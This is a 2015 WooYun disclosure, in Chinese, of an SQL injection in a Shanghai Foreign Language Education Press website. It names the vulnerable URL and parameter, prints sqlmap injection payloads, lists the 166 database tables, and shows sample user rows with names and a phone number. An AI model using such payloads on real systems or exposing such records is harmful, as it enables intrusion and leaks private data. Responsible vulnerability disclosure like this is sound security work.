上海外语教育出版社某站sql注入 | wooyun-2015-0138140| WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138140

漏洞标题：上海外语教育出版社某站sql注入

相关厂商：sflep.com

漏洞作者：路人甲

提交时间：2015-08-31 13:04

修复时间：2015-10-15 14:06

公开时间：2015-10-15 14:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-31：细节已通知厂商并且等待厂商处理中
2015-08-31：厂商已经确认，细节仅向厂商公开
2015-09-10：细节向核心白帽子及相关领域专家公开
2015-09-20：细节向普通白帽子公开
2015-09-30：细节向实习白帽子公开
2015-10-15：细节向公众公开

简要描述：

上海外语教育出版社某站sql注入

详细说明：

http://wg.sflep.com/mainPage/KcDetail.aspx?classid=K201305290001
注入点classid
发之前搜了一下，又有记录。。不过之前的点都已经打不开了，就给发上来了。
Parameter: classid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=K201305290001' AND 1469=1469 AND 'Xigv'='Xigv
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classid=K201305290001' AND 7215=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7215=7215) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'CDNh'='CDNh
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Database: training
[166 tables]
+-------------------------------+
| Alipay_refund_return |
| Alipay_return |
| D99_CMD |
| D99_Tmp |
| ERPBBSBanKuai |
| ERPBBSTieZi |
| ERPBBSTieZi1 |
| E_ImportAtta |
| E_ImportMail |
| E_MailContent |
| GetNumbers |
| TitleNews |
| View_class_comment |
| add_service_info |
| check_result_info |
| class_attendence_info |
| class_changelog |
| class_comment_info |
| class_detail_time_info |
| class_homework_info |
| class_info |
| class_performance_info |
| class_permit_info |
| class_status_info |
| class_suitable_info |
| class_textbook_info |
| class_time_info |
| class_week_info |
| classroom_info |
| course_info |
| course_info1 |
| dnt_admingroups |
| dnt_adminvisitlog |
| dnt_advertisements |
| dnt_announcements |
| dnt_attachments |
| dnt_attachpaymentlog |
| dnt_attachtypes |
| dnt_banned |
| dnt_bbcodes |
| dnt_bonuslog |
| dnt_creditslog |
| dnt_debatediggs |
| dnt_debates |
| dnt_failedlogins |
| dnt_favorites |
| dnt_forumfields |
| dnt_forumlinks |
| dnt_forums |
| dnt_help |
| dnt_invitation |
| dnt_locations |
| dnt_medals |
| dnt_medalslog |
| dnt_moderatormanagelog |
| dnt_moderators |
| dnt_myattachments |
| dnt_myposts |
| dnt_mytopics |
| dnt_navs |
| dnt_notices |
| dnt_online |
| dnt_onlinelist |
| dnt_onlinetime |
| dnt_orders |
| dnt_paymentlog |
| dnt_pms |
| dnt_polloptions |
| dnt_polls |
| dnt_postdebatefields |
| dnt_postid |
| dnt_posts1 |
| dnt_ratelog |
| dnt_scheduledevents |
| dnt_searchcaches |
| dnt_smilies |
| dnt_statistics |
| dnt_stats |
| dnt_statvars |
| dnt_tablelist |
| dnt_tags |
| dnt_templates |
| dnt_topicidentify |
| dnt_topics |
| dnt_topictagcaches |
| dnt_topictags |
| dnt_topictypes |
| dnt_trendstat |
| dnt_userfields |
| dnt_usergroups |
| dnt_users |
| dnt_words |
| email_content |
| fridenly_link |
| gateway_info |
| image_database |
| image_database2 |
| message_contents |
| message_record |
| news_info |
| news_type_info |
| operate_log |
| order_info |
| order_status_info |
| order_type_info |
| p_menu |
| p_menu1 |
| p_menu2 |
| p_right |
| p_right1 |
| p_role |
| p_role_content |
| p_role_type |
| paper_level_hl |
| paper_manage |
| paper_record |
| pay_type_info |
| proc_err_trace |
| professional_title_info |
| question |
| question_blank |
| question_judge |
| question_type |
| school_introduction |
| send_recoder |
| send_sms_recorde |
| sms_content |
| sms_content2 |
| smtp_set |
| staff |
| staff_hl |
| style |
| suitable_info |
| sysdiagrams |
| t_pwd_reset |
| t_pwd_reset_log |
| teacher |
| teacher_comment_info |
| test |
| textbook_info |
| user_class_detail_info |
| user_class_info |
| user_info |
| user_status |
| v_BBS |
| v_action |
| v_class_info |
| v_class_permit_info |
| v_class_suitable_info |
| v_class_textbook_info |
| v_class_time_info |
| v_courseadmin_user_class_info |
| v_eduadmin_user_class_info |
| v_menu_role |
| v_news_info |
| v_order_info |
| v_staff_role_info |
| v_staff_teacher |
| v_teacher_comment_info |
| v_test |
| v_test_course_id |
| v_user_class_detail_info |
| v_user_class_info |
| v_video_info |
| video_info |
| video_type_info |
+-------------------------------+
Database: training
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.E_ImportMail | 171647 |
+------------------+---------+
十几万邮件记录，可脱裤。
10000 | 58 | 马达121 | 13402128709 | NULL | -1 | [email protected] |
| 100000 | 161 | 张少琼 | <blank> | NULL | -1 | [email protected] |
| 100001 | 161 | 张生祥 | <blank> | NULL | -1 | [email protected] |

漏洞证明：

1

修复方案：

1

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-08-31 14:04

厂商回复：

感谢指出漏洞

最新状态：

暂无